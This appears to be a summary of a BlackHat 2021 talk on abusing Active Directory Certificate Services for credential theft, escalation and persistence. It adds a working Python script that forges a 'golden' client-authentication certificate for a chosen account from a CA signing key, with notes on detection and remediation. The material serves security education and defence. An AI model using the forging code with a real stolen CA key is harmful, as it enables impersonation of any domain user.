Certified Pre-Owned: Abusing Active Directory Certificate Services

Conference:  BlackHat USA 2021



Active Directory Certificate Services (AD CS) offers substantial abuse potential for credential theft, domain escalation and domain persistence. The presentation covers stealing existing certificates, actively enrolling for new ones, certificate template misconfigurations that lead to domain escalation, and forging certificates with a stolen CA private key.
  • AD CS has a lot of abuse potential that both attackers and defenders have largely overlooked
  • Stealing existing certificates and actively enrolling for new ones give user and machine persistence; misconfigured certificate templates can lead to domain escalation
  • Active malicious enrollment is a particularly interesting area
  • Domain persistence is a huge area of tradecraft
  • A 140-page white paper with complete details and extensive defensive information is available
  • Tools such as Certify and ForgeCert will be released on the GhostPack GitHub repo
  • Golden certificates, forged with a stolen CA private key, can authenticate as any active user or computer and recover that account's NTLM credentials
  • Certificate-based Kerberos authentication (PKINIT, MS-PKCA) can be used to retrieve a user's or computer's NTLM hash
  • An anecdote illustrates how a forged certificate was used to access the file system on the DC
In the anecdote, the presenter ran code on the CA server to extract the CA's private key with DPAPI, used that key to forge a certificate for administrator@theshire.local, authenticated to the DC with the forged certificate to access its file system, and recovered the administrator's NTLM hash through a Kerberos user-to-user (U2U) request.
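The following Python script, built on the `cryptography` library, is an added example and not Certify, ForgeCert, or any code from the talk. It shows the mechanics behind a "golden" certificate: with the CA's signing key, an attacker mints a client-authentication certificate whose subject alternative name carries the UPN of the target account, and the KDC has no way to tell it from a legitimately issued one. The CA key is generated locally here to stand in for one exported from the CA with DPAPI, and the CA name, the domain theshire.local and the UPN are illustrative values.

```python
"""Forge a client-auth ("golden") certificate from a CA signing key.

Added example, not the talk's tooling. The CA below is constructed locally
to stand in for a real enterprise CA whose key was stolen via DPAPI.
"""
import datetime

from cryptography import x509
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding, rsa
from cryptography.x509.oid import ExtendedKeyUsageOID, NameOID

# Microsoft szOID_NT_PRINCIPAL_NAME: the SAN otherName type carrying a UPN
UPN_OID = x509.ObjectIdentifier("1.3.6.1.4.1.311.20.2.3")


def make_ca(common_name="theshire-DC-CA"):
    """Stand-in for the enterprise CA whose private key the attacker exported."""
    key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, common_name)])
    now = datetime.datetime.now(datetime.timezone.utc)
    cert = (
        x509.CertificateBuilder()
        .subject_name(name)
        .issuer_name(name)
        .public_key(key.public_key())
        .serial_number(x509.random_serial_number())
        .not_valid_before(now - datetime.timedelta(days=1))
        .not_valid_after(now + datetime.timedelta(days=3650))
        .add_extension(x509.BasicConstraints(ca=True, path_length=None), critical=True)
        .sign(key, hashes.SHA256())
    )
    return key, cert


def encode_upn(upn):
    """DER-encode the UPN as a UTF8String for the otherName value (short-form length only)."""
    raw = upn.encode("utf-8")
    assert len(raw) < 128, "illustrative UPNs only; long names need long-form length"
    return b"\x0c" + bytes([len(raw)]) + raw


def forge_client_cert(ca_key, ca_cert, upn, subject_cn="User"):
    """Mint a certificate for `upn`, signed directly by the CA key.

    The CA never processed an enrollment request for this certificate, so it has
    no entry in the CA database; that is why a golden certificate survives
    template hardening and why defenders must compare presented certificates
    against the CA's issued log rather than trusting the chain alone.
    """
    key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    now = datetime.datetime.now(datetime.timezone.utc)
    cert = (
        x509.CertificateBuilder()
        .subject_name(x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, subject_cn)]))
        .issuer_name(ca_cert.subject)
        .public_key(key.public_key())
        .serial_number(x509.random_serial_number())
        .not_valid_before(now - datetime.timedelta(days=1))
        .not_valid_after(now + datetime.timedelta(days=365))
        # PKINIT requires a client-authentication capable EKU
        .add_extension(x509.ExtendedKeyUsage([ExtendedKeyUsageOID.CLIENT_AUTH]), critical=False)
        # The UPN in the SAN is what the KDC maps to the AD account
        .add_extension(x509.SubjectAlternativeName([x509.OtherName(UPN_OID, encode_upn(upn))]), critical=False)
        .sign(ca_key, hashes.SHA256())
    )
    return key, cert


def upn_from_cert(cert):
    """Return the UPN otherName from the SAN, as the KDC would read it."""
    san = cert.extensions.get_extension_for_class(x509.SubjectAlternativeName).value
    for other in san.get_values_for_type(x509.OtherName):
        if other.type_id == UPN_OID and other.value[0] == 0x0C:
            return other.value[2:].decode("utf-8")  # skip tag and short-form length
    return None


def has_client_auth_eku(cert):
    eku = cert.extensions.get_extension_for_class(x509.ExtendedKeyUsage).value
    return ExtendedKeyUsageOID.CLIENT_AUTH in eku


def chains_to_ca(cert, ca_cert):
    """The check a KDC effectively performs before mapping the certificate to an
    account: is the signature valid under a CA it trusts (NTAuthCertificates)?"""
    try:
        ca_cert.public_key().verify(
            cert.signature, cert.tbs_certificate_bytes,
            padding.PKCS1v15(), cert.signature_hash_algorithm)
        return True
    except Exception:
        return False


if __name__ == "__main__":
    ca_key, ca_cert = make_ca()
    _, forged = forge_client_cert(ca_key, ca_cert, "administrator@theshire.local")
    print(upn_from_cert(forged), has_client_auth_eku(forged), chains_to_ca(forged, ca_cert))
```

Nothing in the forged certificate distinguishes it from one the CA issued, which is the point of the technique: the only binding to an account is the UPN the attacker chose, and the only trust decision the KDC makes is whether the signing CA is in NTAuthCertificates. Detection therefore has to look at what the CA actually issued (its database and request audit events), not at the certificate itself, and remediation after CA key theft means rotating the CA key, not tightening templates.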


Microsoft's Active Directory Public Key Infrastructure (PKI) implementation, known as Active Directory Certificate Services (AD CS), has largely flown under the radar of both the offensive and defensive realms. AD CS is widely deployed and provides attackers opportunities for credential theft, machine persistence, domain escalation, and subtle domain persistence. We will present the relevant background on certificates in Active Directory, detail the abuse of AD CS through certificate theft and active malicious enrollments for user and machine persistence, discuss a set of common certificate template misconfigurations that can result in domain escalation, and explain a method for stealing a Certificate Authority's private key in order to forge new user/machine "golden" certificates. By bringing light to the security implications of AD CS, we hope to raise awareness for both attackers and defenders alike of the security issues surrounding this complex, widely deployed, and often misunderstood system.